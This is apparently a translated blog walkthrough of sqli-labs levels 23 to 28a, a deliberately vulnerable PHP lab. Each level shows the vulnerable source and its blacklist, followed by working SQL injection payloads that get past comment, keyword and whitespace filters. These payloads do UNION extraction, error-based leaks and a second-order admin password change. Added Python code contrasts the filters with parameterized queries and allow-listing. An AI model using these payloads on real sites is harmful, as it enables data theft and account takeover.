Lab practice: Sqli-labs walkthrough (GET-based bypasses), levels 23 to 28a
0x00 Lab environment
Local machine: Win 10
Lab: sqli-labs (65 levels in total, one level per day)
0x02 Walkthrough
Note: one level a day!
(23) Level 23:
Look at the source code:
In the source, the comment markers are replaced with an empty string, namely # and -- (so --+ no longer works either).
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //filter the comments out so as to comments should not work
    $reg = "/#/";
    $reg1 = "/--/";
    $replace = "";
    $id = preg_replace($reg, $replace, $id);
    $id = preg_replace($reg1, $replace, $id);
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    // ... (the rest of the handler is omitted in the write-up)
}
Run the statements directly against the database: first a plain query by id, then a UNION query.
If you are no longer allowed a comment marker at the end, why not let the rest of the statement run as a normal query!
As shown below, the tail simply executes as an ordinary query: as long as the statement is syntactically closed, no # or --+ is needed and no error is raised.
$sql="SELECT * FROM users WHERE id='$id' union select 1,2,'3' LIMIT 0,1";
So we can construct:
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),'3
Give it a try:
Level cleared!
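As an added illustration (not code from the lab or from this write-up): a Python/sqlite3 stand-in for the level-23 handler with the same comment-stripping filter, next to the parameterized form. The users rows are constructed sample data; the payload shape is the balanced one shown above.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the lab's users table (sample rows only).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
""")


def strip_comments(user_id: str) -> str:
    """Port of the level-23 filter: delete '#' and '--', and nothing else."""
    user_id = re.sub(r"#", "", user_id)
    return re.sub(r"--", "", user_id)


def lookup_by_concat(user_id: str):
    """Level-23 style: filter, then splice the value into the SQL text.
    Removing comment markers does not stop the value from closing the
    quote and continuing the statement."""
    sql = f"SELECT * FROM users WHERE id='{strip_comments(user_id)}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_parameterized(user_id: str):
    """Hardened form: the driver binds the value as data, so whatever the
    string contains, it is compared against id and never parsed as SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    # The balanced payload from the write-up: the trailing '3 re-closes the
    # quote, so no comment marker is needed and the filter has nothing to do.
    payload = "-1' union select 1,2,'3"
    print("concat:", lookup_by_concat(payload))      # (1, 2, '3')
    print("bound: ", lookup_parameterized(payload))  # None
```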
(24) Level 24:
This level tests second-order injection; for how second-order injection works and how to defend against it, see my article "Second-order injection: principle and defense" (二次注入原理及防御).
if($pass==$re_pass)
{
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
    $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
    $row = mysql_affected_rows();
    echo '<font size="3" color="#FFFF00">';
    echo '<center>';
    if($row==1)
    {
        echo "Password successfully updated";
    }
    // ... (the rest of the handler is omitted in the write-up)
}
When the password of the user admin'# is changed, the '# closes the statement, and the query ends up changing admin's password:
$sql = "UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$curr_pass' ";
So this level needs no further discussion.
(25) Level 25:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing below; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);    //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);   //Strip out AND (non case sensitive)
    return $id;
}
The source shows that or and and are filtered. For filters of this kind, see my earlier article "SQL injection: ten thousand ways to bypass a WAF" (SQL注入绕过waf的一万种姿势).
and can be replaced with &&, and or with ||. The usual options are:
(1) Case variation: Or, OR, oR
(2) Encoding: hex, urlencode
(3) Inserting comments: /*or*/
(4) Operator substitution: and = &&, or = ||
1'|| extractvalue(1,concat(0x7e,database()))--+
Level cleared!
(25a) Level 25a:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing below; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        //echo 'YOU ARE IN ........';
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="5" color="#FFFF00">';
        //echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);    //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);   //Strip out AND (non case sensitive)
    return $id;
}
This level drops the single quotes and does not print errors: the error output is replaced by "You are in .......". Otherwise it is much like level 25. Error-based injection is out, so try time-based and UNION injection instead:
-1 union select 1,database(),3#
-1 || 1=1#
(26) Level 26:
Spaces are filtered, as well as or, and, /, --, #, \\ and similar characters:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing below; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);       //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);     //strip out /*
    $id= preg_replace('/[--]/',"", $id);       //Strip out -- (the class matches any single '-')
    $id= preg_replace('/[#]/',"", $id);        //Strip out #
    $id= preg_replace('/[\s]/',"", $id);       //Strip out spaces (ASCII whitespace only without /u; the 0xA0 byte is not matched)
    $id= preg_replace('/[\/\\\\]/',"", $id);   //Strip out slashes
    return $id;
}
%09  horizontal tab
%0a  line feed (new line)
%0c  form feed (new page)
%0d  carriage return
%0b  vertical tab
%a0  space (the 0xA0 byte)
Use a UNION query (tested on PHP 5.2: %a0 can stand in for the space; on 5.4 and 5.5 it cannot):
' union select 1,database(),3--+
becomes:
1000000000%27%a0union%a0select%a01,2,%273
(27) Level 27:
Level 27 filters even more:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing below; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);    //strip out /*
    $id= preg_replace('/[--]/',"", $id);      //Strip out -- (the class matches any single '-')
    $id= preg_replace('/[#]/',"", $id);       //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);      //Strip out spaces and '+'.
    $id= preg_replace('/select/m',"", $id);   //Strip out select (case-sensitive).
    $id= preg_replace('/[ +]/',"", $id);      //Strip out spaces again.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);   //Strip out select
    $id= preg_replace('/UNION/s',"", $id);    //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);    //Strip out Union
    $id= preg_replace('/Select/s',"", $id);   //Strip out Select
    return $id;
}
Filtered: /*, --, #, spaces, select, union, UNION, SELECT, Union and Select.
Try mixed case or repetition to bypass it (this is on PHP 5.4/5.5; 5.2 suddenly stopped working, which is a bit absurd!):
-100'%0BunIon%0BSelEcT%0B1,database(),'3
%0b stands in for the space; for the other keywords, just mix the case arbitrarily.
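An added check that is not code from the lab or from this write-up, covering the keyword blacklists of levels 25 through 27 above: Python ports of the two blacklist() functions are run over the write-up's own payloads (URL-decoded) to show what they let through, beside a positive allow-list check for the numeric id that the lab's own error message asks for. The helper and constant names are my own.

```python
import re


def lab_blacklist_25(user_id: str) -> str:
    """Port of the level-25 blacklist(): delete 'or' and 'and', any case."""
    user_id = re.sub(r"or", "", user_id, flags=re.I)
    return re.sub(r"and", "", user_id, flags=re.I)


# Port of the level-27 blacklist(): same deletions in the same order. Its
# '[\/\*]', '[--]' and '[ +]' classes each match one character, so they reduce
# to character deletions ('[--]' is a class holding only '-'); '/select/m' and
# the '/.../s' patterns are plain case-sensitive literals.
LEVEL27_TOKENS = ["/", "*", "-", "#", " ", "+",
                  "select", "union", "UNION", "SELECT", "Union", "Select"]


def lab_blacklist_27(user_id: str) -> str:
    for token in LEVEL27_TOKENS:
        user_id = user_id.replace(token, "")
    return user_id


def still_carries_sql(value: str) -> bool:
    """Defender's yardstick: does the filtered value still hold a quote, a
    boolean operator, or a union/select pair in any letter case?"""
    low = value.lower()
    return ("'" in low or "||" in low or "&&" in low
            or ("union" in low and "select" in low))


def allowlist_id(user_id: str):
    """Positive validation: optional sign plus digits, returned as an int to
    bind into the query; anything else is rejected before SQL is built."""
    return int(user_id) if re.fullmatch(r"-?\d+", user_id) else None


# Payloads copied from the write-up above, URL-decoded (%0B -> \x0b).
PAGE_PAYLOADS = {
    "level25": "1'|| extractvalue(1,concat(0x7e,database()))--+",
    "level25a": "-1 || 1=1#",
    "level27": "-100'\x0bunIon\x0bSelEcT\x0b1,database(),'3",
}


def filter_report() -> dict:
    """Per payload: (what the level's blacklist lets through, whether that
    still carries SQL, what the allow-list returns for the raw value)."""
    report = {}
    for level, raw in PAGE_PAYLOADS.items():
        strip = lab_blacklist_27 if level == "level27" else lab_blacklist_25
        filtered = strip(raw)
        report[level] = (filtered, still_carries_sql(filtered), allowlist_id(raw))
    report["benign"] = ("1", still_carries_sql("1"), allowlist_id("1"))
    return report
```

Every payload survives its level's blacklist with its SQL intact (level 27 only loses the leading '-'), while the allow-list rejects all three and accepts the plain id.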
(26a) Level 26a:
I got carried away and forgot level 26a, so here it is:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing below; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);       //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);     //strip out /*
    $id= preg_replace('/[--]/',"", $id);       //Strip out -- (the class matches any single '-')
    $id= preg_replace('/[#]/',"", $id);        //Strip out #
    $id= preg_replace('/[\s]/',"", $id);       //Strip out spaces (ASCII whitespace only without /u; the 0xA0 byte is not matched)
    $id= preg_replace('/[\s]/',"", $id);       //Strip out spaces (duplicated in the lab source)
    $id= preg_replace('/[\/\\\\]/',"", $id);   //Strip out slashes
    return $id;
}
Filtered: or, and, /*, --, #, spaces, \\ and so on. The statement is now closed with '), so the tail is closed with (' and the space is written as %a0 (on 5.2; honestly I think both %0b and %a0 should work on 5.2 through 5.5, and the failures probably have some other cause; I'll write a separate post on version-specific bypasses later).
Then just don't use them! I solved this one myself without looking at the answer:
-1000000')%a0union%a0select%a01,2,('3
(27a) Level 27a:
union and select again.
Filtered: /*, --, #, spaces, union, select, UNION, SELECT, Union, Select and so on.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;
    $id = '"' .$id. '"';
    // connectivity
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);    //strip out /*
    $id= preg_replace('/[--]/',"", $id);      //Strip out -- (the class matches any single '-')
    $id= preg_replace('/[#]/',"", $id);       //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);      //Strip out spaces and '+'.
    $id= preg_replace('/select/m',"", $id);   //Strip out select (case-sensitive).
    $id= preg_replace('/[ +]/',"", $id);      //Strip out spaces again.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);   //Strip out select
    $id= preg_replace('/UNION/s',"", $id);    //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);    //Strip out Union
    $id= preg_replace('/Select/s',"", $id);   //Strip out Select
    return $id;
}
The only difference from level 27 is that the value is no longer wrapped in single quotes; it is closed with " instead (on PHP 5.2 and above it is a little odd: no function filters commas, yet there is still a problem; I won't dig into that for now):
-1000"%0BUnIon%0BSeLect%0B1,2,"3
(28) Level 28:
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing above; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);             //strip out /*
    $id= preg_replace('/[--]/',"", $id);               //Strip out -- (the class matches any single '-')
    $id= preg_replace('/[#]/',"", $id);                //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);               //Strip out spaces and '+'.
    //$id= preg_replace('/select/m',"", $id);          //Strip out select (disabled in the lab source).
    $id= preg_replace('/[ +]/',"", $id);               //Strip out spaces again.
    $id= preg_replace('/union\s+select/i',"", $id);    //Strip out UNION & SELECT (any case, separated by \s whitespace).
    return $id;
}
This time anything that combines union and select is removed, and the closing is still ').
Level 28 has a bug; I'll come back and try again later!
(28a) Level 28a:
I'm honestly a bit afraid of bugs; some mystery problems I just can't solve *-*
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id= blacklist($id);   // opening restored from the level-27a listing above; logging lines omitted
    // connectivity
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    //$id= preg_replace('/[\/\*]/',"", $id);           //strip out /* (disabled in the lab source)
    //$id= preg_replace('/[--]/',"", $id);             //Strip out -- (disabled)
    //$id= preg_replace('/[#]/',"", $id);              //Strip out # (disabled)
    //$id= preg_replace('/[ +]/',"", $id);             //Strip out spaces (disabled)
    //$id= preg_replace('/select/m',"", $id);          //Strip out select (disabled)
    //$id= preg_replace('/[ +]/',"", $id);             //Strip out spaces (disabled)
    $id= preg_replace('/union\s+select/i',"", $id);    //Strip out "union<whitespace>select", any case; the only rule still active
    return $id;
}
100%27)%a0unIon%a0sElect%a01,@@basedir,3||(%271
By rights my injection statement above is correct, but level 28 really did stump me! So I'm skipping it. When in trouble, sleep it off!